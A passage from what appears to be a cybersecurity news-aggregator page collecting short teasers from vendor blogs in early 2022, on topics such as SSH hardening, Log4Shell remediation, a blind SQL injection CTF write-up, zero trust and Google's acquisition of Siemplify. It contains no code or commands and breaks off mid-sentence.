As 2022 begins, it’s a great time to set resolutions for the coming year. Don’t worry, we don’t expect you to become a CrossFit guru or break world records on your Peloton. Instead, how about you set goals to improve your abilities as a secure developer? All too often, we choose resolutions that set ourselves up for failure. A better approach is to set realistic goals.

Adding trust to the IoT with Blockchain

Without trust there is nothing. So, while the IoT is changing many parts of the digital transformation landscape, real trust is often the missing component for businesses to fully embrace the technology. How can we be sure that the temperature gauge was working and calibrated? Was it really in the location it said it was and was the limit the actual limit?

5 Best Practices for Securing SSH

Strictly following security best practices is the first step to cybersecurity. Although SSH is the industry standard for both security and efficacy for remote server access, as with any software, SSH is only as secure as configurations applied to the server and client configurations. In this article, we’ll explore five SSH best practices you should observe to boost the security of your infrastructure.

Cybersecurity Trends and Predictions for 2022

The 2022 new year is here! That means it’s time to bid farewell to the winter of 2021. At the same time, looking at security trends can give us insight into the future. Last year was a record-breaking year for data breaches. According to the Identity Theft Resource Center (ITRC), the number of publicly reported 2021 breaches in the first three quarters of this year exceeded the total number of incidents in the entirety of 2020.

Making Sense of the Constantly Changing Log4Shell Landscape

If you find yourself baffled by the influx of events and newly discovered vulnerabilities affecting the popular Apache Log4j Java logging library, this post is for you. This post aims to survey the entire flow of events since the first discovery of CVE-2021-44228, AKA Log4Shell, to the present date, explain the important aspects of each related vulnerability, as well as provide practical remediation and mitigation advice.

Best Practices for Mobile App Security Testing for Developers & Non-Developers

Mobile application security testing (MAST) covers a wide range of topics, including authentication, authorization, data security, session management, and vulnerabilities for hacking. The mobile AST market is made up of buyers and sellers of products that identify vulnerabilities and apps used with mobile platforms during or post-development.

The Best of Both Worlds: Pairing Tripwire ExpertOps with Technical Account Management

This won’t come as a surprise to anyone who’s spoken to me for more than five minutes, but I am a Doctor Who fan. In fact, “fan” is being kind. I’m hopelessly obsessed with the show to the point that more than one ‘Who’ actor has a restraining order out on me.

Key Considerations for Canada's Forthcoming National Cyber Security Strategy

On December 16, Prime Minister Justin Trudeau released mandate letters tasking his ministers of national defense, foreign affairs, public safety, and industry to develop a new “National Cyber Security Strategy.” He specifically highlighted the need for the strategy to “articulate Canada’s long-term strategy to protect our national security and economy, deter cyber threat actors, and promote norms-based international behavior in cyberspace,” as quoted by Global News.

CTF secrets revealed: TopLang challenge from SnykCon 2021 explained

If you attended SnykCon 2021, you may remember our inaugural CTF: Fetch the Flag. In this CTF, TopLang was a web challenge of medium difficulty that we received a lot of positive feedback about. So for those of you that loved it, this write-up explains how our team internally approached tackling and solving this challenge. This challenge was a pretty typical example of what is known as an “oracle attack” using blind SQL injection.

Sentara Uses Identity to Help Drive Better Health Outcomes

I spent part of the summer helping my mother recover from a major surgery. During our time together, she asked: “What is it your company does again?” So I explained: “We help manage digital identities. For example, if your healthcare system used ForgeRock, you could login to the website and see your records and medications from your surgeon, your GI specialist, your general practitioner, your physical therapist and more.

ISO 27001 Penetration Testing: What Is It And Why You Need It

ISO 27001 is an international information security standard. You may have heard of it, but do you know what it really means? What does ISO 27001 penetration testing mean for your company's cyber-security efforts? And why should you care about implementing ISO 27001 in the first place? Watch this video to find out!

SMB Ports Explained: 445 and 139 - Learn the difference

In this video I go over the difference between SMB ports 445 and 139. It's important to know how these two ports can help you keep your network safe from attack, so watch this video if you want to learn more about them! Cyphere is a UK-based cyber security services provider helping organisations to secure their most prized assets. We provide technical risk assessment (pen testing/ethical hacking) and managed security services. This advice is a true third party opinion, free from any vendor inclinations or reselling objectives.

Technology's contributions toward safety in healthcare

This blog was written by an independent guest blogger. Technology in healthcare has the potential to make all the difference in terms of safety outcomes. Right now, modern tech is pushing the envelope of what is possible in the doctor’s office and the patient’s home, as telehealth and artificial intelligence transform the landscape of medical care. But technology isn’t always safe.

Siemplify is Joining Forces with Google Cloud

Today, I am excited and proud to announce that Siemplify has been acquired by Google. This marks an important milestone in the Siemplify journey. When co-founders Alon Cohen and Garry Fatakhov and I started Siemplify in 2015, we all knew, from our experience building and training security operations centers from around the world, that security operations was a function in dire need of innovation.

Power the SOC of the Future with the DataLinq Engine - Part 1

Evidence continues to mount that it isn’t a matter of if, but when and how an organization will be attacked. So, we are seeing Security Operations Centers (SOCs) narrow the focus of their mission to become detection and response organizations. As they look to address additional use cases, including threat detection and monitoring, investigation, incident response and hunting, data becomes incredibly more important.

Redefining Challenges for Zero Trust in the Federal Space

President Biden’s Executive Order 14028 to improve the nation’s cybersecurity and protect federal government networks, was released more than half a year ago. At the time, one of the most exciting aspects about it was the multiple uses of the term “zero trust,” as Netskope discussed in a blog at the time. However, it’s clear that federal agencies are still working out the specifics of how to actually approach implementing zero trust.

New workshop for securing a DevOps pipeline with Snyk, Bitbucket, and AWS

Development teams are frequently under the gun to deliver software quickly, which is difficult to do without modern tools to build, test, and deploy applications efficiently. That’s why Atlassian’s Bitbucket Cloud — a Git-based source code repository service in the cloud that streamlines software development for collaborative teams — was built for both speed and effi